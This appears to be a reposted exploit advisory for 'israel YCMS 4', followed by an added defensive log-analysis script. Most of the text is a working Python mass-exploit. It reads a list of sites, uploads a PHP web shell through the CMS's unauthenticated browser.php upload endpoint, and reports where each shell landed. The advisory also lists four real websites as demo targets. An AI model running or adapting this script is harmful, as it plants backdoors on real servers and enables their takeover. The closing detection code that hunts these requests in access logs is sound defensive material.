israel YCMS 4 - Remote File Upload - CSRF / Shell Upload

CVE: N/A
Category: CWE-434
Price: Unknown
Severity: High
Author: Unknown
Risk: High
Exploitation Type: Remote
Date: 2023-11-29
CVSS: N/A - CVSS score not provided for this exploit

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2023110032

Below is a copy:

[-] Title : israel YCMS  4 - Remote File Upload - CSRF / Shell Upload
[-] Author : 1933 (TURK TM - SS CYBER)
[-] Vendor : https://website.laki.co.il/
[-] Category : Webapps
[-] Dork : intext: " "  
[-] Date : 20/11/2023
[-] Demo Targets :
1-http://barak.ksite.co.il/
2-https://website.laki.co.il/
3-https://chanofan.com/
4-http://www.radio-lev.co.il/


Exploit:
import requests
import re
from colorama import *
import os
if os.name == 'nt':
    os.system('cls')
else:
    os.system('clear')
init()
code_up = """
<!DOCTYPE html>
<html>
<head>
  <title>1933-SS</title>
  <style>
    body {
      background-color: black;
      text-align: center;
    }
    h1 {
      color: red;
    }
    .uploaded {
      color: green;
    }
  </style>
</head>
<body>
  <h1>1933-ss cyber team</h1>
  <form enctype='multipart/form-data' action='' method='POST'>
    <input type='file' name='uploaded_file'></input>
    <input type='submit' value='Upload'></input>
  </form>
</body>
</html>

<?php
if (!empty($_FILES['uploaded_file'])) {
  $upload_dir = './';  // Define the directory where you want to save the uploaded files
  $file_name = basename($_FILES['uploaded_file']['name']);
  $file_path = $upload_dir . $file_name;

  if (move_uploaded_file($_FILES['uploaded_file']['tmp_name'], $file_path)) {
    echo '<span class="uploaded">The file ' . $file_name . ' has been uploaded.</span>';
  } else {
    echo '<h1>There was an error uploading the file, please try again.</h1>';
  }
}
?>

"""
banner = Fore.CYAN +"""
   _____ _____    _______     ______  ______ _____    _______ ______          __  __ 
  / ____/ ____|  / ____\ \   / |  _ \|  ____|  __ \  |__   __|  ____|   /\   |  \/  |
 | (___| (___   | |     \ \_/ /| |_) | |__  | |__) |    | |  | |__     /  \  | \  / |
  \___ \\\___ \  | |      \   / |  _ <|  __| |  _  /     | |  |  __|   / /\ \ | |\/| |
  ____) ____) | | |____   | |  | |_) | |____| | \ \     | |  | |____ / ____ \| |  | |
 |_____|_____/   \_____|  |_|  |____/|______|_|  \_\    |_|  |______/_/    \_|_|  |_|
     """                                                                                
banner2 = "\nCoded by :" + Fore.RED +""" T.ME/D4LGH4CK_TM | T.ME/SS_CYBER_TEAM"""
print(banner+banner2+Fore.WHITE)
websites = input("\nwebsite list: ")
websites = open(websites,"r").read().split("\n")

for url in websites:
    try:
        value = "yadmin/apps/browser.php?op=gallery&CKEditor=page-content&CKEditorFuncNum=1&langCode=en"
        upload_url = url+'/yadmin/apps/browser.php?op=upload&type=other&id=*'
        uploader = {'upload-to-gallery[]': ('ss.php',code_up)}
        response = requests.post(upload_url, files=uploader , timeout=3)
    except:
        pass
    try:
        response = requests.get(url+value,timeout=10)
        if response.status_code == 200:
            match = re.search(r'/ss(\d+\.php)', response.text)
            if match:
                value = match.group(1)
                print(Fore.GREEN +url+f"uploads/other/ss{value}")
        else:
            print(Fore.RED+f"Request to {url} failed with status code {response.status_code}"+Fore.WHITE)
    except:
        continue


**************************************************
- Telegram : @asad_turk0
- Tnx : RED KURD (@RED_AS_SOCITY)
- Thanks to my dear friend "RED KURD" for help to discover the bug.
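
For defenders, the two request patterns in the script above (a POST to `yadmin/apps/browser.php?op=upload` and a later fetch of a `.php` file under `uploads/`) can be hunted in web access logs. The following is an added example, not part of the original advisory; it assumes combined-format access logs, and the function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qs

# Assumption: Apache/nginx "combined" access-log format.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')
UPLOAD_ENDPOINT = "/yadmin/apps/browser.php"  # endpoint named in the script above
SCRIPT_IN_UPLOADS = re.compile(r"/uploads/.+\.(?:php\d?|phtml|phar)$", re.I)

# Constructed sample lines (documentation IP ranges, invented timestamps and sizes).
SAMPLE_LOG = [
    '203.0.113.7 - - [20/Nov/2023:10:01:02 +0000] "POST /yadmin/apps/browser.php?op=upload&type=other&id=* HTTP/1.1" 200 15 "-" "python-requests/2.31.0"',
    '203.0.113.7 - - [20/Nov/2023:10:01:03 +0000] "GET /yadmin/apps/browser.php?op=gallery&langCode=en HTTP/1.1" 200 5120 "-" "python-requests/2.31.0"',
    '203.0.113.7 - - [20/Nov/2023:10:04:40 +0000] "GET /uploads/other/ss1700474462.php HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [20/Nov/2023:10:05:00 +0000] "GET /uploads/other/logo.png HTTP/1.1" 200 9001 "-" "Mozilla/5.0"',
]

def classify(line):
    """Return (ip, timestamp, finding) for a suspicious request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, _, qs = m["target"].partition("?")
    path = re.sub(r"/{2,}", "/", path)  # url + '/yadmin' can yield '//yadmin'
    if (m["method"] == "POST" and path.endswith(UPLOAD_ENDPOINT)
            and "upload" in parse_qs(qs).get("op", [])):
        return m["ip"], m["ts"], "upload-endpoint-post"
    # A script answering from the upload directory means an upload became executable.
    if SCRIPT_IN_UPLOADS.search(path) and m["status"] != "404":
        return m["ip"], m["ts"], "script-in-upload-dir"
    return None

def scan(lines):
    return [f for f in map(classify, lines) if f]

def correlate(findings):
    """IPs that both posted to the upload endpoint and fetched a script from uploads/."""
    seen = {}
    for ip, _ts, kind in findings:
        seen.setdefault(ip, set()).add(kind)
    return sorted(ip for ip, kinds in seen.items() if len(kinds) == 2)

if __name__ == "__main__":
    hits = scan(SAMPLE_LOG)
    for hit in hits:
        print(*hit)
    print("upload then fetch:", correlate(hits))
```

An IP returned by `correlate` both posted to the upload endpoint and then fetched a script from the upload directory. A `script-in-upload-dir` hit on its own already warrants checking `uploads/` for unexpected `.php` files.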
